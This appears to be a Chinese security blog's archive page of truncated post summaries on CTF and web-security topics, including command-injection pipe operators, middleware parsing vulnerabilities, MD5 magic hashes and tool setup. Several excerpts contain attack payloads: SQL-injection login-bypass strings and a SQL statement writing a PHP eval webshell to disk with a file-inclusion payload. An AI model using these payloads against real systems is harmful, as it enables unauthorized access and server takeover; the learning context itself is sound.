11 2020 档案
摘要:问题:sudo service postgresql start 启动后 发现连不上数据库,psql 和msfconsole都提示: could not connect to database template1: could not connect to server: No such file
阅读全文
摘要:常见管道符 Windows系统支持的管道符 |直接执行后面的语句||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句&前面和后面命令都要执行,无论前面真假&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 Linux系统支持的管道符 |、||、&、&&这四种管道符都存在且用
阅读全文
摘要:解析漏洞常见于IIS、Apache、Nginx这类的中间件对应版本存在的解析问题,存在的问题都在于中间件。 一、IIS5.X-6.X解析漏洞 1、目录解析 在IIS 6.0版本中有个目录解析漏洞,该漏洞的问题存在于如果你在网站目录中创建一个*./asp、.asa的文件夹,那么你上传的任何文件比如一个
阅读全文
摘要:常见万能密码: "or "a"="a'.).or.('.a.'='.aor 1=1--'or 1=1--a'or' 1=1--"or 1=1--'or.'a.'='a"or"="a'='a'or''=''or'='or'admin'or 1=1#'='&password='='admin' or
阅读全文
摘要:select "<?php @eval($_POST['#@!']);?>" into outfile "/tmp/muma.php"page=/tmp/muma.phpdata://text/plain,%3C?php%20$a_code%20=%20file_get_contents(%27fl
阅读全文
摘要:题目要求v1是字符串、v2是数字并且他们的md5值相同显示flag,因此: v1和v2的MD5值为0e即可,因此可以是: v1=QNKCDZO&v2=240610708 这里附上常见的0E开头的MD5 0e开头的md5和原值: QNKCDZO 0e83040045199349405802421990
阅读全文
摘要:1、更新源 2、下载并安装pwntools 1 cd ~ 2 git clone https://github.com/Gallopsled/pwntools 3 cd pwntools 4 5 apt-get install python3 python3-pip python3-dev git
阅读全文
摘要:kali安装pip 0x01 pip2(python2)安装: wget https://bootstrap.pypa.io/2.6/get-pip.py 这里提示下:如果是2.7的版本,就使用这个wget https://bootstrap.pypa.io/2.7/get-pip.py pytho
阅读全文
摘要:题目: 分析代码: 需要满足2个条件: 1、username=admin并且password!=admin 2、cookie中的check必须等于secret拼接username拼接password的md5值 secret提示是10 ahash的值是由secret以及adminadmin的md5值组
阅读全文
摘要:更换中文: sudo dpkg-reconfigure locales 取消en_US.UTF-8 选择zh_CN.GBK、zh_CN.UTF-8 (用空格选定) 接着选择字符: zh_CN.UTF-8 重启reboot 解决编码错误显示问题,终端输入: sudo apt-get install t
阅读全文
摘要:绕过登陆常用万能密码 所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。分享给大家、、 希望对大家有所帮助!asp aspx万能密码1:"or "a"="a2:'.).or.('.a.'='.a 3:or 1=1--4:'or 1=1-
阅读全文